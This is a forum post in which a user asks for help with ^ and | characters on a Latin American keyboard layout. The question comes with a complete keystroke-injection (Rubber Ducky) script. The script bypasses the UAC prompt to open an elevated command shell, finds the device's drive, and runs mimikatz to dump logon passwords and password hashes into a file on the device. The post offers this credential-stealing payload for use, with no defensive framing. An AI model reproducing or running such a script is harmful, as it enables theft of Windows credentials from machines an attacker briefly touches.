Jump to content

Latin American Keyboard problem


warmotion

Recommended Posts

hello I'm from Mexico and I have a problem with 2 characters with latin american keyboard, someone could help me fix it?.... characters are: ^ |


REM *** UAC Bypass ***

DELAY 2000

WINDOWS r

DELAY 200

STRING powershell Start-Process cmd -Verb runAs

ENTER

DELAY 2000

LEFTARROW

DELAY 500

ENTER

DELAY 500


REM *** Define DUCKY drive as %duck%

STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d

ENTER

DELAY 500


REM *** Execute mimikatz from SD card and save log file to disk ***

STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt

ENTER


REM *** GTFO ***

STRING exit

ENTER

STRING exit

ENTER

Link to comment
Share on other sites

  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...